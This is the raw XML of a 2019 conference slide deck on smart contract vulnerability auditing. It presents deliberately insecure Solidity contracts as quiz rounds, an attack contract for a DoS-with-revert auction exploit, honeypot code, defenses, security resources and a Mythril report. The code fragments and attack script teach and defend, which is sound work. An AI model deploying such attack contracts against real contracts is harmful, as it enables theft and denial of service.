              </a:rPr>
              <a:t>player.playerAddress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2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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>player.secretValueByUser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_secret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200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player.secretValueByUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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C678DD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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secretValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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sz="22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player.playerAddress.transfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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(address(this).balance));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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sz="22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sz="22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2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75074" y="640080"/>
            <a:ext cx="207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INSECURE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66218" y="496741"/>
            <a:ext cx="1828800" cy="8098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257" y="2842680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Honeypot 2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5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7"/>
            <a:ext cx="11943806" cy="5606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pragma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>solidity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^</a:t>
            </a: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import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98C379"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"./FC2"</a:t>
            </a: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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FC1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D19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FC2</a:t>
            </a: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fc2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payable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 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addressOfContract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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor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payable _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addr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{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fc2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B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FC2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(_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addr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addressOfContract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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr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getRich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 payable{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addressOfContract.call.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a: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sz="2000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sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abi.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encodeWithSignature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98C379"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gsf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()"</a:t>
            </a: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));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7"/>
            <a:ext cx="11943806" cy="5606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pragma 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solidity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 ^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19A66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678DD"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>contract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FC2</a:t>
            </a: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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tgeo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payable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{}</a:t>
            </a:r>
            <a:endParaRPr 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external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payable{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D19A66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msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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D19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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56B6C2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer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C678DD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).balance);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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getContractBalance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view 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19A66"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uint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C678DD"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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19A66"/>
                </a:solidFill>
                <a:latin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678DD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).balance;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7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318" y="2981347"/>
            <a:ext cx="7774577" cy="8416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Round 1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13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131" y="987754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You guys look Scared… </a:t>
            </a:r>
            <a:b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I should Stop now…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19" y="2659109"/>
            <a:ext cx="4727258" cy="3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8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Resources for Smart Contract Security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57560" cy="494093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Practice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ethereum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> based CTFs: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Ethernaut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Solidity Underhand Challenge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Decentralized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application Security Project (or DASP) Top 10 of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2018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dasp.co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Consensys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Smart Contract Best Practices guide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consensys.github.io/smart-contract-best-practices/known_attacks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1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Smart Contract Automated Hunting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57560" cy="494093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Static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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manticore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Dynamic binary analysis tool with EVM support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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mythril</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Reversing and bug hunting framework for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ethereum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> blockchain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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oyente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Analyze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ethereum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code to find common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solgraph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Generates a DOT graph that visualizes function control flow of a Solidity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contract and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>highlights potential security vulnerabilities.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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SmartCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Static analysis of Solidity source code for security vulnerabilities and best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  practices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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Securify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - an automated formal verifier for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ethereum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> smart contracts.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Mythril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Sample Report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91886" y="1556563"/>
            <a:ext cx="10620103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$ myth -x Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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ethernaut-token.sol</a:t>
            </a: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==== Integer Underflow ====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SWC ID: 101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Type: Warning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Contract: Token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Function name: transfer(address,uint256)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PC address: 469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Estimated Gas Usage: 758 - 1043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The subtraction can result in an integer underflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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--------------------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In file: Desktop/ethernaut-token.sol:13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balances[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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msg.sender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] - _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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value</a:t>
            </a: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--------------------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==== Integer Underflow ====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SWC ID: 101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Type: Warning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Contract: Token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Function name: transfer(address,uint256)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PC address: 551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Estimated Gas Usage: 1291 - 1766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The subtraction can result in an integer underflow.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021" y="1026943"/>
            <a:ext cx="6740434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That’s All Folks</a:t>
            </a:r>
            <a:b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Thank you </a:t>
            </a:r>
            <a:b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Questions?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87826" y="3683208"/>
            <a:ext cx="10467704" cy="84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sarangparikh22@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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7826" y="2985372"/>
            <a:ext cx="10467704" cy="84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I am on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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12984" y="3770866"/>
            <a:ext cx="672681" cy="672681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28528" y="4443547"/>
            <a:ext cx="10467704" cy="84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sarang.parikh@consensys.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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39" y="5534188"/>
            <a:ext cx="562767" cy="56276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-705396" y="5375109"/>
            <a:ext cx="10467704" cy="84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sarangparikh22</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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3" y="4582964"/>
            <a:ext cx="981021" cy="81057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-705396" y="6045488"/>
            <a:ext cx="10467704" cy="84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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="36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arang.parikh1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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77" y="6236882"/>
            <a:ext cx="491129" cy="491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83" y="1236417"/>
            <a:ext cx="3929488" cy="22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8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 smtClean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contract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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Round1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5C6370"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="1" dirty="0" smtClean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0.5.0 explication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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highestBidder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highestBidAmount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US" b="0" dirty="0" smtClean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b="0" dirty="0" smtClean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bid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payable{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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4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highestBidAmount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highestBidder.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" err="1" smtClean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highestBidAmount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highestBidder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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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highestBidAmount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b="0" dirty="0" smtClean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sz="2400" b="0" dirty="0" smtClean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75074" y="640080"/>
            <a:ext cx="207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INSECURE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66218" y="496741"/>
            <a:ext cx="1828800" cy="8098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762" y="5063365"/>
            <a:ext cx="5669281" cy="84160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Answer</a:t>
            </a:r>
            <a:b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sz="4800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DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800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With Revert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="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28" y="321129"/>
            <a:ext cx="5593079" cy="41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 smtClean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contract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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Round1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5C6370"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="1" dirty="0" smtClean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0.5.0 explication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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highestBidder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highestBidAmount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US" b="0" dirty="0" smtClean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b="0" dirty="0" smtClean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bid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payable{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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4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highestBidAmount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highestBidder.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" err="1" smtClean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highestBidAmount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highestBidder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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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highestBidAmount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400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b="0" dirty="0" smtClean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BBBBBB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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4845" y="3474720"/>
            <a:ext cx="7001691" cy="4572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Left Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8294913" y="3545057"/>
            <a:ext cx="888274" cy="128669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8216536" y="3474720"/>
            <a:ext cx="966651" cy="135702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58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232116"/>
            <a:ext cx="11943806" cy="662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//Attack Script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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contract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean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R1A</a:t>
            </a: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DOSwithRevert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dwr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b="0" dirty="0" err="1" smtClean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setAddress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dwr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 smtClean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DOSwithRevert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b="0" dirty="0" err="1" smtClean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callBid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payable{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dwr.bid.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean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).balance)();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b="0" dirty="0" err="1" smtClean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addBal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payable{}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() payable </a:t>
            </a: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	require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smtClean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b="0" dirty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318" y="2981347"/>
            <a:ext cx="7774577" cy="8416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Round 2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7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969</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>334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Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Smart Contract  Vulnerabilities Assessment &amp; Auditing</vt:lpstr>
      <vt:lpstr>#who am i</vt:lpstr>
      <vt:lpstr>Let The Game Begin…</vt:lpstr>
      <vt:lpstr>Round 1 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Answer DoS With Revert</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Round 2 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Answer DoS With Gas Limit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security against DOS based attacks</vt:lpstr>
      <vt:lpstr>Round 3 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hint Rhymes with Nancy Sounds Fancy</vt:lpstr>
      <vt:lpstr>Answer Re-Entrancy</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security against Re-Entrancy based attacks</vt:lpstr>
      <vt:lpstr>Round 4 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hint Look Closely.. Under the Functions</vt:lpstr>
      <vt:lpstr>Answer Arithmetic Underflow</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security against Arithmetic Flows Attacks</vt:lpstr>
      <vt:lpstr>Round 5 </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hint </vt:lpstr>
      <vt:lpstr>Answer Front Running</vt:lpstr>
      <vt:lpstr>Security against Front Running (Really?)</vt:lpstr>
      <vt:lpstr>Round 6</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Answer Randomization is Hard</vt:lpstr>
      <vt:lpstr>Honeypot 1</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Honeypot 2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>You guys look Scared…  I should Stop now…</vt:lpstr>
      <vt:lpstr>Resources for Smart Contract Security</vt:lpstr>
      <vt:lpstr>Smart Contract Automated Hunting</vt:lpstr>
      <vt:lpstr>Mythril Sample Report</vt:lpstr>
      <vt:lpstr>That’s All Folks Thank you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Contract Vulnerabilities Assessment</dc:title>
  <dc:creator>Sarang Parikh</dc:creator>
  <cp:lastModifiedBy>Sarang Parikh</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-03T12:30:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-19T12:30:41Z</dcterms:modified>
</cp:coreProperties>
</file>